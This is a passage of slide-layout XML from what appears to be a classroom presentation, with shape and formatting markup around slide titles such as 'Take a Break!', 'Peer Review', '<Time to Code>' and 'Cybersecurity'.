        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1023" name="Google Shape;1023;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10559806" y="3048000"/>
            <a:ext cx="3258038" cy="436866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24"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1025" name="Google Shape;1025;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="24377574" cy="13712428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="Google Shape;1026;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-67" y="2519467"/>
            <a:ext cx="24377701"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Take a Break!</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1027" name="Google Shape;1027;p76"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146399" y="5338400"/>
            <a:ext cx="12084899" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="Google Shape;1028;p7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29"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Google Shape;1030;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="24377574" cy="13712428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Google Shape;1031;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-67" y="1097067"/>
            <a:ext cx="24377701"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Take a Break!</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1032" name="Google Shape;1032;p77"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146399" y="3916000"/>
            <a:ext cx="12084899" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033" name="Google Shape;1033;p7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34"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1035" name="Google Shape;1035;p7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36" name="Google Shape;1036;p7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37" name="Google Shape;1037;p78"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9446339" y="7111733"/>
            <a:ext cx="14835299" cy="2079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38" name="Google Shape;1038;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9446139" y="5568800"/>
            <a:ext cx="14835299" cy="612900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="243750" rIns="0" bIns="243750" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Time For a Quick Video</a:t>
            </a:r>
            <a:endParaRPr sz="6400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1039" name="Google Shape;1039;p78"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12515940" y="7111733"/>
            <a:ext cx="8696100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1040" name="Google Shape;1040;p78"/>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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000" flipH="1">
            <a:off x="16342144" y="3092266"/>
            <a:ext cx="1477933" cy="1277867"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMerge">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="71372"/>
            </a:srgbClr>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1043" name="Google Shape;1043;p79"/>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4" name="Google Shape;1044;p7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45" name="Google Shape;1045;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4570609" y="5772000"/>
            <a:ext cx="14835299" cy="612900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="243750" rIns="0" bIns="243750" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Time For a Quick Video</a:t>
            </a:r>
            <a:endParaRPr sz="6400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1046" name="Google Shape;1046;p79"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7640410" y="7314933"/>
            <a:ext cx="8696100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1047" name="Google Shape;1047;p79"/>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79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000" flipH="1">
            <a:off x="11466614" y="3295466"/>
            <a:ext cx="1477933" cy="1277867"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMerge">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="71372"/>
            </a:srgbClr>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79"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3425574" y="7483400"/>
            <a:ext cx="17457901" cy="2079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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1051" name="Google Shape;1051;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="24377673" cy="13712428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="574200"/>
            <a:ext cx="24377701"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25600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="25600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Amatic SC"/>
                <a:ea typeface="Amatic SC"/>
                <a:cs typeface="Amatic SC"/>
                <a:sym typeface="Amatic SC"/>
              </a:rPr>
              <a:t>Peer Review</a:t>
            </a:r>
            <a:endParaRPr sz="25600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Amatic SC"/>
              <a:ea typeface="Amatic SC"/>
              <a:cs typeface="Amatic SC"/>
              <a:sym typeface="Amatic SC"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053" name="Google Shape;1053;p8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54"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1055" name="Google Shape;1055;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4917184" y="1581200"/>
            <a:ext cx="18238918" cy="11634970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1056" name="Google Shape;1056;p81"/>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12000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="12000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>&lt;Time to Code&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="12000" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1057" name="Google Shape;1057;p8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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p2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61" name="Google Shape;1061;p25"/>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62" name="Google Shape;1062;p25"/>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063" name="Google Shape;1063;p25"/>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064" name="Google Shape;1064;p2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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1066" name="Google Shape;1066;p82"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675963" y="9592914"/>
            <a:ext cx="21025801"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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Google Shape;1068;p83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675963" y="5292616"/>
            <a:ext cx="21025801"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1069" name="Google Shape;1069;p83"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="5814"/>
            <a:ext cx="23513872" cy="13485748"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13485748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1070" name="Google Shape;1070;p83"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="228870"/>
              <a:ext cx="23520930" cy="13256877"/>
              <a:chOff x="0" y="-1"/>
              <a:chExt cx="23520930" cy="13256877"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1071" name="Google Shape;1071;p8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072" name="Google Shape;1072;p8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073" name="Google Shape;1073;p8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4" name="Google Shape;1074;p8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8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8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8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8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79" name="Google Shape;1079;p83"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="20968243" y="-1"/>
              <a:ext cx="1898100" cy="1898100"/>
              <a:chOff x="-1" y="-1"/>
              <a:chExt cx="1898100" cy="1898100"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1080" name="Google Shape;1080;p8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4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081" name="Google Shape;1081;p8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66"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Google Shape;67;p31"/>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68" name="Google Shape;68;p31"/>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1"/>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Cybersecurity</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="Google Shape;70;p31"/>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71" name="Google Shape;71;p31"/>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2" name="Google Shape;72;p31"/>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3" name="Google Shape;73;p31"/>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74" name="Google Shape;74;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1807557" y="3072384"/>
            <a:ext cx="6094420" cy="4509867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;75;p31"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1083" name="Google Shape;1083;p84" descr="Google Shape;802;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="32151"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027240" y="11035278"/>
            <a:ext cx="3202713" cy="2141038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084" name="Google Shape;1084;p8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85" name="Google Shape;1085;p84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="24377701"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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1087" name="Google Shape;1087;p8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88" name="Google Shape;1088;p8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89" name="Google Shape;1089;p8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0" name="Google Shape;1090;p8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1" name="Google Shape;1091;p8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2" name="Google Shape;1092;p8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3" name="Google Shape;1093;p8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4" name="Google Shape;1094;p85"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1095" idx="0"/>
            <a:endCxn id="1096"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7" name="Google Shape;1097;p8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8" name="Google Shape;1098;p8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9" name="Google Shape;1099;p8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sp>
        <p:nvSpPr>
          <p:cNvPr id="1100" name="Google Shape;1100;p8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1" name="Google Shape;1101;p8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2" name="Google Shape;1102;p8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3" name="Google Shape;1103;p8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4" name="Google Shape;1104;p8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5" name="Google Shape;1105;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14021223"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6" name="Google Shape;1106;p8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7" name="Google Shape;1107;p8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8" name="Google Shape;1108;p8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096" name="Google Shape;1096;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15286963"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9" name="Google Shape;1109;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14021223"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1110" name="Google Shape;1110;p85"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15058863"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111" name="Google Shape;1111;p85"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1112"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sp>
        <p:nvSpPr>
          <p:cNvPr id="1113" name="Google Shape;1113;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16427334"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14" name="Google Shape;1114;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19534691"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1115" name="Google Shape;1115;p85"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1116" idx="0"/>
            <a:endCxn id="1117" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="22059398"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sp>
        <p:nvSpPr>
          <p:cNvPr id="1117" name="Google Shape;1117;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21866498"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16" name="Google Shape;1116;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21866498"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095" name="Google Shape;1095;p8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12" name="Google Shape;1112;p8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17"/>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600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1118" name="Google Shape;1118;p85"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19" name="Google Shape;1119;p85"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675963" y="9592914"/>
            <a:ext cx="21025801"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1120" name="Google Shape;1120;p85"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="1121"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sp>
        <p:nvSpPr>
          <p:cNvPr id="1122" name="Google Shape;1122;p8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21" name="Google Shape;1121;p8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23" name="Google Shape;1123;p8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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
